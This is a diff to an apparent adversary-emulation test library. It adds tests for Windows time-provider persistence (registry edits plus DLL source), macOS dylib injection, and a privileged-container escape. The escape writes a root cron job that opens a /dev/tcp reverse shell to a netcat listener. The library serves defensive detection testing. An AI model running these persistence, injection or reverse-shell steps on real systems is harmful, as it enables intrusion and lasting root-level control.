+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
+net start w32time
+```
+
+#### Cleanup Commands:
+```powershell
+net stop w32time
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
+rm -force C:\Users\Public\AtomicTest.dll
+```
+
+
+
+
+
+<br/>

atomics/T1547.003/T1547.003.yaml

@@ -0,0 +1,54 @@
+attack_technique: T1547.003
+display_name: Time Providers
+atomic_tests:
+- name: Create a new time provider
+  auto_generated_guid: df1efab7-bc6d-4b88-8be9-91f55ae017aa
+
+  description: |
+    Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+    The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+    in C:\Users\Public\ as validation that the test is successful.
+
+    Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
+      net start w32time
+    cleanup_command: |
+      net stop w32time
+      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
+      rm -force C:\Users\Public\AtomicTest.dll
+    name: powershell
+    elevation_required: true
+
+- name: Edit an existing time provider
+  auto_generated_guid: 29e0afca-8d1d-471a-8d34-25512fc48315
+
+  description: |
+    Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+    The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+    in C:\Users\Public\ as validation that the test is successful.
+
+    Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
+      net start w32time
+    cleanup_command: |
+      net stop w32time
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
+      rm -force C:\Users\Public\AtomicTest.dll
+    name: powershell
+    elevation_required: true

atomics/T1547.003/src/AtomicTest.c

@@ -0,0 +1,65 @@
+/*
+   Atomic Test T1547.003
+
+   Author:    traceflow
+              https://github.com/tr4cefl0w
+
+   Credits:   https://github.com/scottlundgren/w32time
+              https://pentestlab.blog/2019/10/22/persistence-time-providers/
+
+   Resources: https://docs.microsoft.com/en-us/windows/win32/sysinfo/creating-a-time-provider
+              https://docs.microsoft.com/en-us/windows/win32/sysinfo/sample-time-provider
+*/
+
+
+#include <windows.h>
+#include "timeprov.h"
+
+TimeProvSysCallbacks sc;
+const TimeProvHandle htp = (TimeProvHandle)1;
+TpcGetSamplesArgs Samples;
+DWORD dwPollInterval;
+
+void Run(void) {
+
+    CreateFile("c:\\users\\public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+
+    return;
+
+}
+
+HRESULT CALLBACK TimeProvOpen(WCHAR *wszName, TimeProvSysCallbacks *pSysCallback, TimeProvHandle *phTimeProv) {
+
+	CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Run, 0, 0, 0);
+
+	CopyMemory(&sc, (PVOID)pSysCallback, sizeof(TimeProvSysCallbacks));
+	*phTimeProv = htp;
+
+   return S_OK;
+}
+
+HRESULT CALLBACK TimeProvCommand(TimeProvHandle hTimeProv, TimeProvCmd eCmd, PVOID pvArgs) {
+   
+   switch( eCmd ) {
+      case TPC_GetSamples:
+      // Return the Samples structure in pvArgs.
+         CopyMemory(pvArgs, &Samples, sizeof(TpcGetSamplesArgs));
+         break;
+      case TPC_PollIntervalChanged:
+      // Retrieve the new value.
+         sc.pfnGetTimeSysInfo( TSI_PollInterval, &dwPollInterval );
+         break;
+      case TPC_TimeJumped:
+      // Discard samples saved in the Samples structure.
+         ZeroMemory(&Samples, sizeof(TpcGetSamplesArgs));
+         break;
+      case TPC_UpdateConfig:
+      // Read the configuration sirmation from the registry.
+         break;
+   }
+   return S_OK;
+}
+
+HRESULT CALLBACK TimeProvClose(TimeProvHandle hTimeProv) {
+   return S_OK;
+}

atomics/T1547.003/src/AtomicTest.def

@@ -0,0 +1,5 @@
+LIBRARY
+EXPORTS
+  TimeProvOpen
+  TimeProvCommand
+  TimeProvClose

atomics/T1547.003/src/build.bat

@@ -0,0 +1 @@
+cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll

atomics/T1574.006/T1574.006.md

@@ -14,6 +14,8 @@ On macOS this behavior is conceptually the same as on Linux, differing only in h
 
 - [Atomic Test #2 - Shared Library Injection via LD_PRELOAD](#atomic-test-2---shared-library-injection-via-ld_preload)
 
+- [Atomic Test #3 - Dylib Injection via DYLD_INSERT_LIBRARIES](#atomic-test-3---dylib-injection-via-dyld_insert_libraries)
+
 
 <br/>
 
@@ -114,4 +116,56 @@ gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Dylib Injection via DYLD_INSERT_LIBRARIES
+injects a dylib that opens calculator via env variable
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 4d66029d-7355-43fd-93a4-b63ba92ea1be
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_inject | Path of executable to be injected. Mostly works on non-apple default apps. | Path | /Applications/Firefox.app/Contents/MacOS/firefox|
+| source_file | Path of c source file | Path | PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c|
+| dylib_file | Path of dylib file | Path | /tmp/T1574006MOS.dylib|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
+```
+
+#### Cleanup Commands:
+```bash
+kill `pgrep Calculator`
+kill `pgrep firefox`
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Compile the dylib from (#{source_file}). Destination is #{dylib_file}
+##### Check Prereq Commands:
+```bash
+gcc -dynamiclib #{source_file} -o #{dylib_file}
+```
+##### Get Prereq Commands:
+```bash
+gcc -dynamiclib #{source_file} -o #{dylib_file}
+```
+
+
+
+
 <br/>

atomics/T1611.002/T1611.002.yaml

@@ -1,92 +0,0 @@
-attack_technique: T1611.002
-display_name: "Escape to Host"
-
-atomic_tests:
-- name: Mount host filesystem to escape privileged Docker container
-  auto_generated_guid: 6c499943-b098-4bc6-8d38-0956fc182984
-  description: |
-    This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser.
-    The container running the test needs be privileged.  It may take up to a minute for this to run due to how often crond triggers a job.
-    Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell. 
-
-  supported_platforms:
-  - containers
-
-  input_arguments:
-    mount_device:
-      description: Path to the device of the host's disk to mount
-      type: Path
-      default: /dev/dm-0
-
-    mount_point:
-      description: Path where the host filesystem will be mounted
-      type: Path
-      default: /mnt/T1611.002
-
-    cron_path:
-      description: Path on the host filesystem where cron jobs are stored
-      type: Path
-      default: /etc/cron.d
-
-    cron_filename:
-      description: Filename of the cron job in cron_path
-      type: String
-      default: T1611_002
-
-    listen_address:
-      description: IP address to listen for callback from the host system.
-      type: String
-      default: "`ifconfig eth0 | grep inet | awk '{print $2}'`"
-
-    listen_port:
-      description: TCP Port to listen on for callback from the host system.
-      type: String
-      default: 4444
-
-  dependency_executor_name: sh
-  dependencies:
-  - description: Verify mount is installed.
-    prereq_command: |
-      which mount
-    get_prereq_command: |
-      if [ "" == "`which mount`" ]; then echo "mount Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install mount ; elif [ -n "`which yum`" ]; then sudo yum -y install mount ; fi ; else echo "mount installed"; fi
-
-  - description: Verify container is privileged.
-    prereq_command: |
-      capsh --print | grep cap_sys_admin
-    get_prereq_command: |
-      if [ "`capsh --print | grep cap_sys_admin`" == "" ]; then echo "Container not privileged.  Re-start container in insecure state.  Docker: run with --privileged flag.  Kubectl, add securityContext: privileged: true"; fi
-
-  - description: Verify mount device (/dev/dm-0) exists.
-    prereq_command: |
-      ls #{mount_device}
-    get_prereq_command: |
-      if [ ! -f #{mount_device} ]; then echo "Container not privileged or wrong device path.  Re-start container in insecure state.  Docker: run with --privileged flag.  Kubectl, add securityContext: privileged: true"; fi
-
-  - description: Netcat is installed.
-    prereq_command: |
-      which netcat
-    get_prereq_command: |
-      if [ "" == "`which netcat`" ]; then echo "netcat Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install netcat ; elif [ -n "`which yum`" ]; then sudo yum -y install netcat ; fi
-
-  - description: IP Address is known.
-    prereq_command: |
-      if [ "#{listen_address}" != "" ]; then echo "Listen address set as #{listen_address}" ; fi
-    get_prereq_command: |
-      if [ "" == "`which ifconfig`" ]; then echo "ifconfig Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install net=tools ; elif [ -n "`which yum`" ]; then sudo yum -y install net-tools ; fi
-
-  executor:
-    name: sh
-    elevation_required: true
-    command: |
-      if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
-      echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
-      echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
-      echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
-      echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
-      echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
-      netcat -l -p #{listen_port} 2>&1
-    cleanup_command: |
-      rm #{mount_point}#{cron_path}/#{cron_filename}
-      umount #{mount_point}
-      rmdir #{mount_point}

atomics/T1611/T1611.md

@@ -10,6 +10,8 @@ Gaining access to the host may provide the adversary with the opportunity to ach
 
 - [Atomic Test #1 - Deploy container using nsenter container escape](#atomic-test-1---deploy-container-using-nsenter-container-escape)
 
+- [Atomic Test #2 - Mount host filesystem to escape privileged Docker container](#atomic-test-2---mount-host-filesystem-to-escape-privileged-docker-container)
+
 
 <br/>
 
@@ -98,4 +100,104 @@ mv kubectl /usr/bin/kubectl
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Mount host filesystem to escape privileged Docker container
+This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser.
+The container running the test needs be privileged.  It may take up to a minute for this to run due to how often crond triggers a job.
+Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 6c499943-b098-4bc6-8d38-0956fc182984
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mount_device | Path to the device of the host's disk to mount | Path | /dev/dm-0|
+| mount_point | Path where the host filesystem will be mounted | Path | /mnt/T1611.002|
+| cron_path | Path on the host filesystem where cron jobs are stored | Path | /etc/cron.d|
+| cron_filename | Filename of the cron job in cron_path | String | T1611_002|
+| listen_address | IP address to listen for callback from the host system. | String | `ifconfig eth0 | grep inet | awk '{print $2}'`|
+| listen_port | TCP Port to listen on for callback from the host system. | String | 4444|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
+echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
+echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
+echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
+echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
+echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
+netcat -l -p #{listen_port} 2>&1
+```
+
+#### Cleanup Commands:
+```sh
+rm #{mount_point}#{cron_path}/#{cron_filename}
+umount #{mount_point}
+rmdir #{mount_point}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Verify mount is installed.
+##### Check Prereq Commands:
+```sh
+which mount
+```
+##### Get Prereq Commands:
+```sh
+if [ "" == "`which mount`" ]; then echo "mount Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install mount ; elif [ -n "`which yum`" ]; then sudo yum -y install mount ; fi ; else echo "mount installed"; fi
+```
+##### Description: Verify container is privileged.
+##### Check Prereq Commands:
+```sh
+capsh --print | grep cap_sys_admin
+```
+##### Get Prereq Commands:
+```sh
+if [ "`capsh --print | grep cap_sys_admin`" == "" ]; then echo "Container not privileged.  Re-start container in insecure state.  Docker: run with --privileged flag.  Kubectl, add securityContext: privileged: true"; fi
+```
+##### Description: Verify mount device (/dev/dm-0) exists.
+##### Check Prereq Commands:
+```sh
+ls #{mount_device}
+```
+##### Get Prereq Commands:
+```sh
+if [ ! -f #{mount_device} ]; then echo "Container not privileged or wrong device path.  Re-start container in insecure state.  Docker: run with --privileged flag.  Kubectl, add securityContext: privileged: true"; fi
+```
+##### Description: Netcat is installed.
+##### Check Prereq Commands:
+```sh
+which netcat
+```
+##### Get Prereq Commands:
+```sh
+if [ "" == "`which netcat`" ]; then echo "netcat Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install netcat ; elif [ -n "`which yum`" ]; then sudo yum -y install netcat ; fi
+```
+##### Description: IP Address is known.
+##### Check Prereq Commands:
+```sh
+if [ "#{listen_address}" != "" ]; then echo "Listen address set as #{listen_address}" ; fi
+```
+##### Get Prereq Commands:
+```sh
+if [ "" == "`which ifconfig`" ]; then echo "ifconfig Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install net=tools ; elif [ -n "`which yum`" ]; then sudo yum -y install net-tools ; fi
+```
+
+
+
+
 <br/>

atomics/T1611/T1611.yaml

@@ -56,3 +56,91 @@ atomic_tests:
     name: sh
     cleanup_command: |
       kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
+- name: Mount host filesystem to escape privileged Docker container
+  auto_generated_guid: 6c499943-b098-4bc6-8d38-0956fc182984
+  description: |
+    This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser.
+    The container running the test needs be privileged.  It may take up to a minute for this to run due to how often crond triggers a job.
+    Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell. 
+
+  supported_platforms:
+  - containers
+
+  input_arguments:
+    mount_device:
+      description: Path to the device of the host's disk to mount
+      type: Path
+      default: /dev/dm-0
+
+    mount_point:
+      description: Path where the host filesystem will be mounted
+      type: Path
+      default: /mnt/T1611.002
+
+    cron_path:
+      description: Path on the host filesystem where cron jobs are stored
+      type: Path
+      default: /etc/cron.d
+
+    cron_filename:
+      description: Filename of the cron job in cron_path
+      type: String
+      default: T1611_002
+
+    listen_address:
+      description: IP address to listen for callback from the host system.
+      type: String
+      default: "`ifconfig eth0 | grep inet | awk '{print $2}'`"
+
+    listen_port:
+      description: TCP Port to listen on for callback from the host system.
+      type: String
+      default: 4444
+
+  dependency_executor_name: sh
+  dependencies:
+  - description: Verify mount is installed.
+    prereq_command: |
+      which mount
+    get_prereq_command: |
+      if [ "" == "`which mount`" ]; then echo "mount Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install mount ; elif [ -n "`which yum`" ]; then sudo yum -y install mount ; fi ; else echo "mount installed"; fi
+
+  - description: Verify container is privileged.
+    prereq_command: |
+      capsh --print | grep cap_sys_admin
+    get_prereq_command: |
+      if [ "`capsh --print | grep cap_sys_admin`" == "" ]; then echo "Container not privileged.  Re-start container in insecure state.  Docker: run with --privileged flag.  Kubectl, add securityContext: privileged: true"; fi
+
+  - description: Verify mount device (/dev/dm-0) exists.
+    prereq_command: |
+      ls #{mount_device}
+    get_prereq_command: |
+      if [ ! -f #{mount_device} ]; then echo "Container not privileged or wrong device path.  Re-start container in insecure state.  Docker: run with --privileged flag.  Kubectl, add securityContext: privileged: true"; fi
+
+  - description: Netcat is installed.
+    prereq_command: |
+      which netcat
+    get_prereq_command: |
+      if [ "" == "`which netcat`" ]; then echo "netcat Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install netcat ; elif [ -n "`which yum`" ]; then sudo yum -y install netcat ; fi
+
+  - description: IP Address is known.
+    prereq_command: |
+      if [ "#{listen_address}" != "" ]; then echo "Listen address set as #{listen_address}" ; fi
+    get_prereq_command: |
+      if [ "" == "`which ifconfig`" ]; then echo "ifconfig Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install net=tools ; elif [ -n "`which yum`" ]; then sudo yum -y install net-tools ; fi
+
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
+      echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
+      echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
+      echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
+      echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
+      echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
+      netcat -l -p #{listen_port} 2>&1
+    cleanup_command: |
+      rm #{mount_point}#{cron_path}/#{cron_filename}
+      umount #{mount_point}
+      rmdir #{mount_point}

atomics/used_guids.txt

@@ -1063,3 +1063,6 @@ f3a10056-0160-4785-8744-d9bd7c12dc39
 fecd0dfd-fb55-45fa-a10b-6250272d0832
 cd925593-fbb4-486d-8def-16cbdf944bf4
 4d66029d-7355-43fd-93a4-b63ba92ea1be
+123520cc-e998-471b-a920-bd28e3feafa0
+df1efab7-bc6d-4b88-8be9-91f55ae017aa
+29e0afca-8d1d-471a-8d34-25512fc48315